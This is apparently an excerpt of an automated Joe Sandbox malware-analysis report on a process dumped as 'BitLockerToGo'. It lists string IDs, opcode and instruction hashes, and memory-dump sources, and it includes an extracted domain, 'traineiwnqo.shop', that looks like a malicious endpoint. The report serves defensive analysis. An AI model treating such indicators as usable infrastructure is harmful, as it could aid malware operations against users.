          • String ID: "!$CC$P_$RW$U_$3
          • API String ID: 0-574667654
          • Opcode ID: c4b51d92376cff741dd522550a3a6cba1f88220cc55e6f7aadfbb76d5f028f26
          • Instruction ID: 32b841bf03b20ad9f625492d4b90af74ef50ee2ac08f24dccbf438ce0955bc33
          • Opcode Fuzzy Hash: c4b51d92376cff741dd522550a3a6cba1f88220cc55e6f7aadfbb76d5f028f26
          • Instruction Fuzzy Hash: BED132B01093819BD310DF09D490A6BBBF1EF96388F144A1DE1D98B361E378D995CB9B
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 01$2-wC$DttH$`Web$mXg&$s{>S$x=t3$|$}vp#
          • API String ID: 0-3332577240
          • Opcode ID: f8b330022f5e61e4a26fcbdafce339100315a126424510fad1ebb9376f8768f9
          • Instruction ID: 853d9f6bf2354e92a9dee1a6a22a6d467b715767102ecc3076fb5f3be24ee6c0
          • Opcode Fuzzy Hash: f8b330022f5e61e4a26fcbdafce339100315a126424510fad1ebb9376f8768f9
          • Instruction Fuzzy Hash: 3F7288B050C3808FD315DF18D4906ABFBE1EF96344F148A1DE1CA4B3A2D3799985CB9A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: atyc$micb$mkB$u|p{
          • API String ID: 0-2681846194
          • Opcode ID: 4d506061099f337f6c239b1f9ae42af22e97cabf1379e286ac2555c06a73c731
          • Instruction ID: eed14352bb78df5a86c336bd29a326de0acb98c400771e5c52f97dfa9562d85a
          • Opcode Fuzzy Hash: 4d506061099f337f6c239b1f9ae42af22e97cabf1379e286ac2555c06a73c731
          • Instruction Fuzzy Hash: 6B1215306057918BD7348F25D480B63BBF2EFA2314F658A5ED4E64BBC2D378A805C769
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: UW$4`[b$4`[b$4`[b$T]$UX$kU
          • API String ID: 0-4057271314
          • Opcode ID: 31427ff083c4c35127a329d53a43fcb20a94932e8a16ae2c17682606c4f8be9d
          • Instruction ID: 2ee70e2164894f0263a2616007b7695b604e3b01748a301103711750673c76ee
          • Opcode Fuzzy Hash: 31427ff083c4c35127a329d53a43fcb20a94932e8a16ae2c17682606c4f8be9d
          • Instruction Fuzzy Hash: 3AF198B46083819FE728DF14D991B6FB7E2FB85304F24892DE5C5473A2D7389885CB4A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 0$AQNW$VU$p$x
          • API String ID: 0-3738745974
          • Opcode ID: 03f1ebcff9d6749262c20da91357d74f7575aacd3a4198725e7d5c201ada8cc6
          • Instruction ID: eac3550c5038b9c5101a136c1740ec547a5dd399440fd59a39d864d5124d776c
          • Opcode Fuzzy Hash: 03f1ebcff9d6749262c20da91357d74f7575aacd3a4198725e7d5c201ada8cc6
          • Instruction Fuzzy Hash: 24E125B020C3809BD314EF19C590A2FBBE5EF95748F148A1DE1D99B392C7399815CB9B
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: -u#$E9z?$J=K3$P%_;$\
          • API String ID: 0-4268602472
          • Opcode ID: 4a8373f2f05ef36b96b605d597935eca99ba83ad5e57b7d39a7b4ef8cad603ab
          • Instruction ID: 75df036bb1c6fd8b66953e705bbf0fe5382c9bab640cf8e8efd70ff933f7fd21
          • Opcode Fuzzy Hash: 4a8373f2f05ef36b96b605d597935eca99ba83ad5e57b7d39a7b4ef8cad603ab
          • Instruction Fuzzy Hash: 65813A7420C741CBD318DF28DCA273AB7A1EF8A314F14962EE5854B7E1E7399844CB99
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: /.)($RZ ]$RfB$_[WV
          • API String ID: 0-1565869799
          • Opcode ID: 516c8b19184310a19b231422f5b1d655cec223a9a5633ffe4c0d89f69cfa6164
          • Instruction ID: f1d3dbe78d5f99d1e40b9d082bc96ee0335b832c0d682af001e7bea2e0a0bad1
          • Opcode Fuzzy Hash: 516c8b19184310a19b231422f5b1d655cec223a9a5633ffe4c0d89f69cfa6164
          • Instruction Fuzzy Hash: 6A32E274204B518BD339CF35E1A47A3BBE2AF46308F548A6EC0E787786C739A405CB59
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: .$264&$2A$==Bs
          • API String ID: 0-3406142248
          • Opcode ID: c7b397baa075f652455fa9e320ea5dd5eddf82c664eba8de7a17038bef101e4b
          • Instruction ID: a56383949f493098e493313467f6cff8fc8b86ba10075949e11530e66b2f8825
          • Opcode Fuzzy Hash: c7b397baa075f652455fa9e320ea5dd5eddf82c664eba8de7a17038bef101e4b
          • Instruction Fuzzy Hash: DA0236B5A0C3918FC714CF19D4916ABBBE1AFC9304F04486EE4C687342D339D946CB9A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: $$/.)($4`[b$5
          • API String ID: 0-3935969054
          • Opcode ID: 8e7275754ce150e810a8d4ee05503ecb9aa3862ce1c3d2baee6a6be9da55d019
          • Instruction ID: e1b78ec81548cda021009d897145f6a575e36aac4c331104a53ee0724400cae6
          • Opcode Fuzzy Hash: 8e7275754ce150e810a8d4ee05503ecb9aa3862ce1c3d2baee6a6be9da55d019
          • Instruction Fuzzy Hash: F8F1AAB16083408BD310EF29D88166FBBE5EF85354F04882EF9C587392E739E955CB5A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: ()$4`[b$L1M3$w5M7
          • API String ID: 0-3177161136
          • Opcode ID: 310f425b4370c35d88fd88c6940fd973a92652b35fbe17582df8cc6e173a067a
          • Instruction ID: 7a8c7e22a64126cf52c2f01453b29fc783c719e83acdb6216d06a6b359e05e22
          • Opcode Fuzzy Hash: 310f425b4370c35d88fd88c6940fd973a92652b35fbe17582df8cc6e173a067a
          • Instruction Fuzzy Hash: 7B91C1715082109BD714AF14D8A2ABBB3E5EF95354F08451EF8C69B391E338ED84C79A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: /.)($/.)($4`[b$4`[b
          • API String ID: 0-3239421534
          • Opcode ID: 4edaf742ec3de1233061a0e56f76530d8f664d044291ebc507b94c1acbc839b5
          • Instruction ID: 06c122124c0a94fdcec484fb75245611134eef54f39a040ad1145f332110448c
          • Opcode Fuzzy Hash: 4edaf742ec3de1233061a0e56f76530d8f664d044291ebc507b94c1acbc839b5
          • Instruction Fuzzy Hash: 17B1AE70208341EBE7288F14D961B6FB7F1EFCA354F14892CE5864B291D37AE855CB86
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: O\PB$PDYY$SSHN
          • API String ID: 0-3384902915
          • Opcode ID: 5d05f6a9043ad37e308e0370f57c8ac4a6c612d575e64f490816a788d0edef03
          • Instruction ID: c3a31ce2741b174a9e6ebcbc38a207f6cf5d74e5508e952d4b81521a752f6cf7
          • Opcode Fuzzy Hash: 5d05f6a9043ad37e308e0370f57c8ac4a6c612d575e64f490816a788d0edef03
          • Instruction Fuzzy Hash: E602BEB4604B518BD3248F39D4903A3BBE2FF96304F548A6EC4FA4B386D3396445CB99
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: fm$qA$r
          • API String ID: 0-2197523684
          • Opcode ID: d7e42a7e436fb6789d46a34936b3c090f69d0fa2eba50b54ea501ad9852df74d
          • Instruction ID: 5d033b3a330e60e2212e8b68b7b9e541c435e900af12635ad59dd57e6658b8ac
          • Opcode Fuzzy Hash: d7e42a7e436fb6789d46a34936b3c090f69d0fa2eba50b54ea501ad9852df74d
          • Instruction Fuzzy Hash: 12D1137011C380ABE324DB18D594BAFBBE5EF86704F14482EF48997242D378DC85DB6A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: *-$PO$TV
          • API String ID: 0-2555063705
          • Opcode ID: 4764da8532ffec13f3bda9b34457a7e2fcfcb91c64509d3e3880a8598b13595b
          • Instruction ID: 20b23a6503a29b0f577c78f8d0acbb9ad8103a3fb479d3fabd876f4ced969ade
          • Opcode Fuzzy Hash: 4764da8532ffec13f3bda9b34457a7e2fcfcb91c64509d3e3880a8598b13595b
          • Instruction Fuzzy Hash: 9DD135B01083419BD314DF19D490B6BBBE1FF86348F104A2DE5C99B3A2D738D995CB9A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 0$8
          • API String ID: 0-46163386
          • Opcode ID: 206e8d763d4aa45a14140d3827f98f38c9b107646f33315e84b9a82ce8f0bc4b
          • Instruction ID: 2bd65cb329508929153e0368fd656edf51641c6179af97c1a7e4cae3af578d44
          • Opcode Fuzzy Hash: 206e8d763d4aa45a14140d3827f98f38c9b107646f33315e84b9a82ce8f0bc4b
          • Instruction Fuzzy Hash: 7C7247716083409FDB20CF18C980B5BBBE1AF98314F05892EF9899B391D379D958CB96
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 0$8
          • API String ID: 0-46163386
          • Opcode ID: 956ea7fe0f89e7c45f6812a7e0a119981eda8e896643460e3228b431f565bd68
          • Instruction ID: d70135b525cc106781db9e93feede32c5930dbe67b2da2b054735a2a0e07ed4e
          • Opcode Fuzzy Hash: 956ea7fe0f89e7c45f6812a7e0a119981eda8e896643460e3228b431f565bd68
          • Instruction Fuzzy Hash: 64129C705083809BD325CF68D89076FBBE1AF96304F14483EE4C9A7392D779D949CB6A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: )$IEND
          • API String ID: 0-707183367
          • Opcode ID: c193c43fad0a859558d1f3a964d9b2570a11e6aa2cf1ff538cc41b3f2bf546d0
          • Instruction ID: 604b1ffecebab74bf41fb23b06df68ff13fd873f177ace3e4e077787fdb7f8ca
          • Opcode Fuzzy Hash: c193c43fad0a859558d1f3a964d9b2570a11e6aa2cf1ff538cc41b3f2bf546d0
          • Instruction Fuzzy Hash: CDF1CF71A08B019BD314DF28C85572BBBE1EB84314F14863EE995A73C1D778E914CB8A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: @yC$bvC
          • API String ID: 0-413810154
          • Opcode ID: 9c28c3cb9c12d0478078bcd9b0ec947571a95c764b258f6766d7e14a3f508e28
          • Instruction ID: f02e8eb569a3a6a42852b876dbfa3f5bfde72b1c5a3b7cbeff359c2eeabcecf5
          • Opcode Fuzzy Hash: 9c28c3cb9c12d0478078bcd9b0ec947571a95c764b258f6766d7e14a3f508e28
          • Instruction Fuzzy Hash: 9DA1A93960C251CFC318DF28D59062AB7E2FFCA314F59896DE98A93761C770E851CB86
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: btC$ruC
          • API String ID: 0-3407738418
          • Opcode ID: 52c5ac3c94af0354deadf709a39174961e6833ae273b9f42b81b61c443ceecde
          • Instruction ID: eee13dd835a5a428f7c0a1dd10adc2331028c3f071b7867dbe2a4167c1a8dddc
          • Opcode Fuzzy Hash: 52c5ac3c94af0354deadf709a39174961e6833ae273b9f42b81b61c443ceecde
          • Instruction Fuzzy Hash: 7291E0B9A08266CFCB10CF68D98026EF7B0FF4A315F5A447AD88567351C370AD51CB95
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 2{C$X{C
          • API String ID: 0-2999403496
          • Opcode ID: e010fc7a12804e97f0800c443275da08adc59cc69594ced77d385385cc049b1a
          • Instruction ID: 4d295a038e6fe9e455aaaac55153b05d9cfca1357de211df5c34ff61e6937a32
          • Opcode Fuzzy Hash: e010fc7a12804e97f0800c443275da08adc59cc69594ced77d385385cc049b1a
          • Instruction Fuzzy Hash: AE91B076A18291CFC314CF28D96025AB7E2FBCA325F19887DE8D5C7350D778E9418B85
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: btC$ruC
          • API String ID: 0-3407738418
          • Opcode ID: 7ec441a9a430b22d4a1ba8f45d78619cd49aebf1628227ffea95e88134cd9135
          • Instruction ID: 3c12999ee2f48f63b732735714698a7688cc7d835cddcd9b1aec6cf09051bdfa
          • Opcode Fuzzy Hash: 7ec441a9a430b22d4a1ba8f45d78619cd49aebf1628227ffea95e88134cd9135
          • Instruction Fuzzy Hash: 767188B5E0426ACFCB10CFA8D9802AEB7B1FB0A311F5A04A9D91077351C374AD55CBA8
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 8$lw
          • API String ID: 0-750133594
          • Opcode ID: 894a90900f504895475255d3fa362a14460dd49155a91b7dc9a381f7db68d78e
          • Instruction ID: 5591fc565476e4b09b88eac37685c9ec136f9f4304a331b277d5f1cc73560484
          • Opcode Fuzzy Hash: 894a90900f504895475255d3fa362a14460dd49155a91b7dc9a381f7db68d78e
          • Instruction Fuzzy Hash: DC51EF70118380AFD364DF15D490A5FFBF1EF86319F54892EE99987242D33AD9448B1B
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: /.)($4`[b
          • API String ID: 0-525040469
          • Opcode ID: c3191d6e3c6de3aada8230576888871754b42135e3129239f693af7927dea313
          • Instruction ID: 71be124252a5236f33d649e8415c4be69c6122b9ebdcdc38e9afdbecf747c68e
          • Opcode Fuzzy Hash: c3191d6e3c6de3aada8230576888871754b42135e3129239f693af7927dea313
          • Instruction Fuzzy Hash: C731E234219301DBE7088F24D9A076FB7E1EF89358F14C92CE48A872A1D335D991CF86
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 9
          • API String ID: 0-837608440
          • Opcode ID: 220546e60b5fa50bd968189e7b24368ec2de030299cd662a3aa44039675a5596
          • Instruction ID: b42859884b0ad56d1e8381e29ee347229ef0ee73ca08165d213771ba0b14e467
          • Opcode Fuzzy Hash: 220546e60b5fa50bd968189e7b24368ec2de030299cd662a3aa44039675a5596
          • Instruction Fuzzy Hash: 3A3299716083809BD314CF68D88076FBBE1AF85708F14496EF48997392E778DD89CB5A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: @cB
          • API String ID: 0-1507413002
          • Opcode ID: efc7e782bed3f4754040c76798c45be90034694568309df29bb60df0044c25a0
          • Instruction ID: d94c3a4938c63ea80fde1637e8956818833a178438835eba8de094804c517eb5
          • Opcode Fuzzy Hash: efc7e782bed3f4754040c76798c45be90034694568309df29bb60df0044c25a0
          • Instruction Fuzzy Hash: 6F427D70205B918AD735CF29D1947A3FBE1AF16704F8449AED4EB8B782C339B405CB69
          APIs
          • CoCreateInstance.OLE32(0043B538,00000000,00000001,0043B528), ref: 00419809
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: CreateInstance
          • String ID:
          • API String ID: 542301482-0
          • Opcode ID: ff6cb35c10c278261e5eb79fe75c1021c36d32bfa50ca809adc2779b9f39fa83
          • Instruction ID: ab7a0136b372060ad714af43b12e1594b838d84f7bcc297dfd885977ee9ec93e
          • Opcode Fuzzy Hash: ff6cb35c10c278261e5eb79fe75c1021c36d32bfa50ca809adc2779b9f39fa83
          • Instruction Fuzzy Hash: D551BFB1614300ABDB20AF25CCA2BB733A4FF86758F144519F9858B391E379DC45C76A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: DoC
          • API String ID: 0-2237832012
          • Opcode ID: ac50d49dbb065bcf056e188551ba9d3f8e059da021e95b294a8137ff2ec7623b
          • Instruction ID: 543ab8997921d47249dac4c444afd3d62eaf7a62aad5acecd693937106d77bcc
          • Opcode Fuzzy Hash: ac50d49dbb065bcf056e188551ba9d3f8e059da021e95b294a8137ff2ec7623b
          • Instruction Fuzzy Hash: FA023939A08361CFC314CF2CD89022ABBE1AF89314F5A85BDE8D58B392D775D945CB85
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 4`[b
          • API String ID: 0-3962175265
          • Opcode ID: f91626a3bcb55719959c1ef5ee84f9c32ef534b03cb3b5a9aec54535f069caa6
          • Instruction ID: 7ed853ab267211193b7a24dab7c64f4eab0973d3d593b0758f7be8db432bb903
          • Opcode Fuzzy Hash: f91626a3bcb55719959c1ef5ee84f9c32ef534b03cb3b5a9aec54535f069caa6
          • Instruction Fuzzy Hash: CEF1F271608381DFD714CF28D89175AB7E2BF8A314F148ABDE499873A2C335D949CB4A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: "
          • API String ID: 0-123907689
          • Opcode ID: 8296a046ee2962ad1b533f0ed03763faa28f49587575701548afe7d91146e68c
          • Instruction ID: e71ec9929540a9463c5aee597d4f02aa881249c399715990c813f2f740fe8852
          • Opcode Fuzzy Hash: 8296a046ee2962ad1b533f0ed03763faa28f49587575701548afe7d91146e68c
          • Instruction Fuzzy Hash: 97C13872B083605BD724CE24D480B6BB7D5AFA4350F59892FF889873A2D63CDD44C79A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: @yC
          • API String ID: 0-2666759751
          • Opcode ID: 86449a2efe8a37c910928b03b8f94cf01608bf6861ed3a17f72d698174d5c242
          • Instruction ID: 02884ba85b2f42dc8c2efd82b147294d9b4de87fdeff3787b594e2c785335e1c
          • Opcode Fuzzy Hash: 86449a2efe8a37c910928b03b8f94cf01608bf6861ed3a17f72d698174d5c242
          • Instruction Fuzzy Hash: CBA1DF3660C2418FC718DF28D9A062EB7E2FFC9314F19892DE5C6973A5C775A811CB86
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: traineiwnqo.shop
          • API String ID: 0-223458199
          • Opcode ID: 51219f81e3afb18b017001acbdaeee883cfc5119c49dff401fbc211aba8d31c5
          • Instruction ID: cdb169f497b19616dc45a89326b5fcb330121ed0599e318b5ba5fef2e71bf374
          • Opcode Fuzzy Hash: 51219f81e3afb18b017001acbdaeee883cfc5119c49dff401fbc211aba8d31c5
          • Instruction Fuzzy Hash: 9DB181B4A04216DFDB08CF94DD90ABFBBB1FF4A300F144569E512AB395D3749851CBA8
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID: 0-3916222277
          • Opcode ID: b00cced5009ee70bc796789a3b2a966c912c2a7350d2fe1268083fd6ba09f3f5
          • Instruction ID: 5591ff0dbe7c549fd0af35e5a02bb3a559060dd2593b3f7b076c4913e7cc38e1
          • Opcode Fuzzy Hash: b00cced5009ee70bc796789a3b2a966c912c2a7350d2fe1268083fd6ba09f3f5
          • Instruction Fuzzy Hash: AEB1D0706093809BD324CF58D594B9FFBE1AF86B08F14881EE48997252E3789C45DB6B
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: ,
          • API String ID: 0-3772416878
          • Opcode ID: a6e8e75ce764ba58f216cc51c45b97ed7bd042e6b46cfdcb112312f18e5ac3c6
          • Instruction ID: cf104870c20944ac9730f797fc5b56dce8b60121415d4c6007d167e511d32dbb
          • Opcode Fuzzy Hash: a6e8e75ce764ba58f216cc51c45b97ed7bd042e6b46cfdcb112312f18e5ac3c6
          • Instruction Fuzzy Hash: E2B1497160C3819FD321CF18C88061BFBE0AFA9704F444A2DE5D997382D635EA18CBA7
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: "
          • API String ID: 0-123907689
          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
          • Instruction ID: b6d02c620652c496408cbc267ce8d424b63f3f8488ff8875bb7983690877b963
          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
          • Instruction Fuzzy Hash: 74713632B083215BD714CE28E48031FB7E2ABE5750FA9856FE4958B3A4D338DD45878A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: *-xG
          • API String ID: 0-3506463288
          • Opcode ID: c2c32d66e7cbf171f0db6f3698df62ae15f21f184dfd54c4a1125acc9fb15123
          • Instruction ID: 9885b9b4b067a18f401cd9f980fa97b1e982dd47f07cf5870f1a91220c7b8568
          • Opcode Fuzzy Hash: c2c32d66e7cbf171f0db6f3698df62ae15f21f184dfd54c4a1125acc9fb15123
          • Instruction Fuzzy Hash: 7541E53010CBA18AD325CB38D0543A7FFE2AF66304F98599EC8E74B392C7796446C769
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: @
          • API String ID: 2994545307-2766056989
          • Opcode ID: a27299d4649556ccf1ab2b6d31f1e6ddec5d71aa9f7d028660f3fe0fecb50bda
          • Instruction ID: 829531502c2cd7b408cc448ae50e5ecfebb6b1452b217bd89706ded80ac44e5e
          • Opcode Fuzzy Hash: a27299d4649556ccf1ab2b6d31f1e6ddec5d71aa9f7d028660f3fe0fecb50bda
          • Instruction Fuzzy Hash: 864104715083018BC704DF14C89466BF7F5EFD9328F14962DE99A973A1E739D904CB8A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: @
          • API String ID: 2994545307-2766056989
          • Opcode ID: cb5b1e248262a1685d6a1ddc28cfcc5e0ca71a6a680b0321065331f16e246c90
          • Instruction ID: 117bc3bb7b13d3d55cd6f96a4bfe5cdb821623e9643f4725b9f55d642e66b32d
          • Opcode Fuzzy Hash: cb5b1e248262a1685d6a1ddc28cfcc5e0ca71a6a680b0321065331f16e246c90
          • Instruction Fuzzy Hash: 9B3131B55083019BD310DF08C880A2BFBF5EFDA324F55991EE98497350D339E8488BAB
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7a2e04e6f55ae4a9d795619ef932afdac085464c6a0ef44425c94ca93e535e90
